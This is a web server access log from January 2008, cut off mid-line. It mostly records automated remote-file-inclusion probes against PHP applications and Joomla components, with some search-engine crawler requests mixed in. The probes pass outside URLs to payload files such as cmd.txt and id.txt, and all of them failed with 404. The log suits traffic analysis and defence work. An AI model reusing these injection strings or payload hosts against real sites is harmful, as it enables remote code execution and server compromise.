67.91.198.51 - - [18/Jan/2008:21:52:20 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:21:52:23 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:21:52:24 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:21:52:24 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:53:33 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
200.21.98.67 - - [18/Jan/2008:21:56:13 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.98.67 - - [18/Jan/2008:21:56:14 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.98.67 - - [18/Jan/2008:21:56:14 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [18/Jan/2008:21:57:50 -0800] "GET /logs/access_080101.log/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [18/Jan/2008:21:57:50 -0800] "GET /logs/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [18/Jan/2008:21:58:48 -0800] "GET /logs/access.log/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.151.70 - - [18/Jan/2008:21:58:51 -0800] "GET /logs/access_071229.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.127.151.70 - - [18/Jan/2008:21:58:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.127.151.70 - - [18/Jan/2008:21:58:52 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
58.74.175.5 - - [18/Jan/2008:22:01:38 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [18/Jan/2008:22:01:38 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [18/Jan/2008:22:01:39 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.103.130.64 - - [18/Jan/2008:22:01:41 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.103.130.64 - - [18/Jan/2008:22:01:42 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.103.130.64 - - [18/Jan/2008:22:01:42 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.35.198 - - [18/Jan/2008:22:02:56 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [18/Jan/2008:22:02:56 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [18/Jan/2008:22:02:57 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:22:03:43 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:22:03:43 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:22:03:43 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.62.76 - - [18/Jan/2008:22:03:50 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.76 - - [18/Jan/2008:22:03:50 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.76 - - [18/Jan/2008:22:03:51 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.213.21 - - [18/Jan/2008:22:03:51 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/scrol.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:22:05:14 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:22:05:39 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:22:05:39 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:22:06:14 -0800] "GET /convert/mvcw.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.201 - - [18/Jan/2008:22:08:30 -0800] "GET /logs/access_071007.log HTTP/1.0" 200 56320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.74.175.5 - - [18/Jan/2008:22:08:34 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.153.63 - - [18/Jan/2008:22:10:26 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [18/Jan/2008:22:10:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [18/Jan/2008:22:10:28 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:22:11:21 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.213.21 - - [18/Jan/2008:22:14:04 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/scrol.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.213.21 - - [18/Jan/2008:22:14:04 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/scrol.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.35.198 - - [18/Jan/2008:22:17:05 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.98.67 - - [18/Jan/2008:22:17:34 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:20:25 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:20:26 -0800] "GET /config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:20:26 -0800] "GET /logs/config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.27.27 - - [18/Jan/2008:22:20:45 -0800] "GET /minamijewelry/source_images/batch1/ HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:22:20:54 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:22:20:55 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:22:22:38 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.62.76 - - [18/Jan/2008:22:23:27 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.216 - - [18/Jan/2008:22:24:26 -0800] "GET /logs/access_071226.log HTTP/1.0" 200 357658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:22:24:28 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:22:24:28 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:25:05 -0800] "GET /logs/access_071225.log/index.php?body=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:25:05 -0800] "GET /index.php?body=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:25:05 -0800] "GET /logs/index.php?body=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.210.51 - - [18/Jan/2008:22:25:35 -0800] "GET /logs/@rfihttp://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [18/Jan/2008:22:25:35 -0800] "GET /@rfihttp://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:25:37 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:33:13 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:33:13 -0800] "GET //login.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:33:14 -0800] "GET /logs//login.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.130.181 - - [18/Jan/2008:22:40:42 -0800] "GET /config.php?path_to_root=http://forum.matist.ru/files/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:42:15 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:42:15 -0800] "GET //login.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:22:42:16 -0800] "GET /logs//login.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.107 - - [18/Jan/2008:22:47:15 -0800] "GET /logs/access.log HTTP/1.0" 200 513253 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:49:50 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:49:50 -0800] "GET //skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:49:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:22:52:49 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:00:51 -0800] "GET /logs/access_071225.log/index.php?body=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:00:52 -0800] "GET /index.php?body=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:00:52 -0800] "GET /logs/index.php?body=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.61.135.106 - - [18/Jan/2008:23:02:31 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.142.209.173 - - [18/Jan/2008:23:05:02 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.209.173 - - [18/Jan/2008:23:05:03 -0800] "GET /convert/mvcw.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.209.173 - - [18/Jan/2008:23:05:03 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.117.130.181 - - [18/Jan/2008:23:05:05 -0800] "GET /logs/access.log/config.php?path_to_root=http://forum.matist.ru/files/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [18/Jan/2008:23:05:06 -0800] "GET /logs/config.php?path_to_root=http://forum.matist.ru/files/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.209.173 - - [18/Jan/2008:23:08:08 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.117.130.181 - - [18/Jan/2008:23:09:19 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://forum.matist.ru/files/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.179.212 - - [18/Jan/2008:23:10:24 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.230.197.170 - - [18/Jan/2008:23:12:10 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [18/Jan/2008:23:12:10 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [18/Jan/2008:23:12:10 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.142.215.57 - - [18/Jan/2008:23:13:16 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.142.215.57 - - [18/Jan/2008:23:13:16 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.142.215.57 - - [18/Jan/2008:23:13:17 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:23:14:05 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:23:14:23 -0800] "GET /index.php?option=com_magazine&func=show_magazine&id=&mosConfig_absolute_path=http://www.rootcon.com/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:23:14:24 -0800] "GET /logs/index.php?option=com_magazine&func=show_magazine&id=&mosConfig_absolute_path=http://www.rootcon.com/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:14:43 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:14:43 -0800] "GET //skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:14:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.61.135.106 - - [18/Jan/2008:23:17:07 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.61.135.106 - - [18/Jan/2008:23:17:07 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:23:19:31 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:23:23:27 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:23:23:27 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.126 - - [18/Jan/2008:23:33:13 -0800] "GET /logs/access_071118.log HTTP/1.0" 200 27859 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.45 - - [18/Jan/2008:23:35:35 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.153.63 - - [18/Jan/2008:23:39:02 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [18/Jan/2008:23:39:03 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [18/Jan/2008:23:39:05 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.70.19 - - [18/Jan/2008:23:39:12 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [18/Jan/2008:23:39:12 -0800] "GET /bikes/dteel HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
60.244.114.2 - - [18/Jan/2008:23:41:25 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.244.114.2 - - [18/Jan/2008:23:41:27 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.244.114.2 - - [18/Jan/2008:23:41:32 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.233 - - [18/Jan/2008:23:43:38 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.129.16.106 - - [18/Jan/2008:23:47:42 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.129.16.106 - - [18/Jan/2008:23:47:42 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.129.16.106 - - [18/Jan/2008:23:54:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.129.16.106 - - [18/Jan/2008:23:54:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elnave